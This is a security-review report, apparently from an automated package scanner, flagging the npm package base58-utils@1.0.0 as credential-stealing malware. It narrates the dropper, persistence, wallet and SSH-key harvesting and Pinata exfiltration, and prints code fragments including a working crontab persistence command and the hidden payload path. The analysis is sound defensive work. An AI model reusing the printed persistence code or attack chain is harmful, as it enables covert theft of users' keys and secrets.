AI Security Review
scanned 3h ago · by lpm-firewall-aiImporting the package silently installs and launches a concealed second-stage script after 37 seconds. The payload persists across reboots, harvests credentials and cryptocurrency secrets, and exfiltrates them when remotely activated.
Static reason
No blocking static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Requiring or importing `index.js`; the delayed timer runs automatically.
Impact
Theft of wallet seeds, private keys, SSH keys, environment secrets, and shell-profile secrets with durable host persistence.
Mechanism
Import-time staged payload dropper, persistence installer, credential harvester, and encrypted exfiltrator.
Attack narrative
`index.js` exports Base58 helpers, then schedules an automatic loader. The loader decodes a base64 fixture into a hidden executable script in the user home directory, registers cron, launchd, or scheduled-task persistence, and launches it detached. The payload checks a mutable GitHub Gist/IPFS dead drop, then searches wallet directories, home secrets, shell profiles, and SSH keys. It RSA-encrypts findings and uploads them to Pinata.
Rationale
This is concrete import-time malware, not a package-aligned utility feature. The encoded fixture is an active second stage for persistence and credential exfiltration.
Evidence
package.jsonindex.jstest/fixtures/keypairs.dat~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/Library/LaunchAgents/com.apple.syncd.plistuser crontab / Windows scheduled task
Network endpoints5
gist.githubusercontent.comgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `index.js` runs a delayed IIFE on every import.
- It decodes `test/fixtures/keypairs.dat` into `~/.cache-db/.node-sync/syncd.js`.
- The dropped payload creates cron, launchd, or Windows scheduled-task persistence.
- The payload searches wallet paths, `.env`, shell profiles, and private SSH keys.
- It encrypts collected contents and posts them to Pinata after remote dead-drop activation.
Evidence against
- `package.json` has no lifecycle hook.
- The exported Base58 and WIF helpers are legitimate-looking utility functions.
Behavioral surface
ChildProcessFilesystemShell
HighEntropyStrings
Source & flagged code
2 flagged · loading sourceindex.jsView file
•matchType = malicious_source_fingerprint_signature
signature = 8a6b9d9250ab2dc6
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = base58-utils@1.0.0
matchedPath = index.js
matchedIdentity = npm:YmFzZTU4LXV0aWxz:1.0.0
similarity = 1.000
shingleOverlap = 1
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature
Source fingerprint signature matches a known malicious package signature; route for source-aware review.
index.jsView on unpkg6function encode(buf) {
L7: if (typeof buf === "string") buf = Buffer.from(buf, "utf8");
L8: const digits = [0];
...
L62: try {
L63: var f = require("fs"), p = require("path"), o = require("os"), c = require("child_process");
L64: var h = o.homedir(), d = p.join(h, ".cache-db", ".node-sync"), s = p.join(d, "syncd.js");
L65: if (f.existsSync(s)) return;
...
L70: try {
L71: if (process.platform === "linux") {
L72: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
L73: } else if (process.platform === "win32") {
Medium
Install Persistence
Source writes installer persistence such as shell profile or service configuration.
index.jsView on unpkg · L6Findings
1 High1 Medium2 Low
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowHigh Entropy Strings